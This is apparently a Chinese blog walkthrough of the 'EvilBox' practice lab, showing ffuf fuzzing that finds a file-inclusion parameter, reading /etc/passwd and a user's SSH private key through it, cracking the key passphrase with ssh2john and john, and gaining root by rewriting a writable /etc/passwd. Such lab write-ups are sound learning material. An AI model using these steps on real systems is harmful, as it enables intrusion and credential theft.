扫描打点
dirsearch
扫出来robots.txt
和secret
robots.txt
中拿到用户名H4x0r
secret
是空的,dirsearch
扫不到,fuzz
一下1
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.113/secret/FUZZ.php
得到一个
evil
但还是空的,考虑传参进去
1
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.113/secret/evil.php?FUZZ=/etc/passwd
结果返回的都是
200
但基本都是空,用-fs 0
筛一下拿到参数
command
,有文件包含,顺便看到用户为root
和mowree
getshell
试着访问该用户的
.bash_history
但并没有php
命令执行也不行:那就只能回到
ssh
了,试着读私钥文件:首先要确定一下是否支持用私钥文件登录:
1
ssh mowree@192.168.56.113 -v
看到支持公钥身份认证
那就去偷私钥:
/home/mowree/.ssh/id_rsa
,注意该文件权限应改成600
发现私钥文件被加密了:
先用
ssh2john
提取hash
值,再拿john
爆破:1
2ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt爆出来密码
unicorn
linux
提权由于刚刚 /etc/passwd` 没找到别的用户,那么就应该没有横向,直接提权了
内核没有,sudo没有,
SUID
没什么东西,ps aux
也没什么值得注意的东西然后我对着之前的linux提权一个个看,发现
/etc/passwd
可写:用
openssl passwd -1
生成密码的md5
,扔到/etc/passwd
的root
里面然后切换过去就行
学长的任务罢了11-evilbox
- 本文链接: http://noone40404.github.io/2025/01/15/学长的任务罢了11:evilbox/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!